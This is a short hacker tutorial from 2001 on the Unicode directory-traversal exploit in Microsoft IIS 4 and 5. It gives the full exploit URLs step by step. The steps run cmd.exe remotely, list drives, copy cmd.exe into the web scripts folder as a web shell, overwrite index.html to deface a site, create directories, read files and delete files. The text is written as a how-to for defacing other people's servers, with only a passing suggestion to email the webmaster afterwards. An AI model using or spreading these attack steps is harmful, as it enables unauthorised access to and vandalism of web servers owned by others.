UNICODE EXPLOIT IIS 4 + 5 (441 total words in this text) (3 reads) UNICODE EXPLOIT IIS 4 + 5 ________________________________ 18-4-01=This Tutorial has been written by THxZ0NE a.k.a THxZ a.k.a |THxZ0NE|======= ========do not change this tutorial without permission from me============ ===============for qeustions mail to:=============== Contact Secure Logics -------------------------------------------------------------------------------- The subject about this tutorial is the UNICODE IIS4 + 5 Exploit.. NOTE : You can use unicodexecute2.pl in combination with activeperl or use your webbrowser. ---------------------------------------------------------------------------------- Do you use windows than is Grinder a handy program to scan for webservers. ----------------------------------------------------------------------------------- - Allright let's begin.. - the ip that we use for this example iss 127.0.0.1 ------------------------------------------------------------------------------------ 1 ...... 127.0.0.1 must be vulnerable for the exploit.. so we type this commando in our webbrowser : http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c: When you see te index of drive c: than he's vulnerable.. First check or the directory c:Inetpubwwwroot you do that like this http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:Inetpubwwwroot and c:winntsystem32 you do that like this http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:winntsystem32 exists. ------------------------------------------------------------------------------------- 2........ Than you must copy cmd.exe from c:winntsystem32 to c:Inetpubscripts You do that with the following command. http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe%20c:Inetpubscriptscmds.exe when the directory Inetpub/Scripts exist on another drive for example e: then you must type http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe%20e:Inetpubscriptscmds.exe When you have done this, you are ready to do anything what you want to. Buttt when you get the message "acces is denied" then the server is patched...and than you have to take another one. ----------------------------------------------------------------------------------------- 3...... Now you have to go to the directory where the page is.. when Inetpubwwwroot exist on c: then you have to type this : http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:Inetpubwwwroot or on e: http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:Inetpubwwwroot ----------------------------------------------------------------------------------------- 4...... when you see the html wich you want to deface..as example index.html Then you need to type this : http://127.0.0.1/scripts/cmds.exe?+/c+echo+YOUR TEXT+>+c:Inetpubwwwrootindex.html Now he will write the rule "YOUR TEXT" to index.html and when you open your browser and type http://127.0.0.1 you will see your rule instead of the webpage :))) And you are ready !! butt don't change to much ... And send an email to the webmaster that he must update his sever.... ------------------------------------------------------------------------------------------- You can do also other thing like .. make a directory ... http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+mkdir+0wn3D_By_THxZ0NE ------------ or when you want to look att drive d: or e: or F: you need to type this http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+d: http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e: http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+f: ------------- Open a textfile as example zone.txt on the drive c: http://IP/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+type+c:zone.txt 18-4-01=This Tutorial has been written by THxZ0NE a.k.a THxZ a.k.a |THxZ0NE|======= ========do not change this tutorial without permission from me============ ===============for qeustions mail to:=============== Contact Secure Logics _________________________________________ - Some Commando's echo: upload dir+c: Look at the files on harddisk c: del+c:thxzone.txt means that you delete the file thxzone.txt on drive c: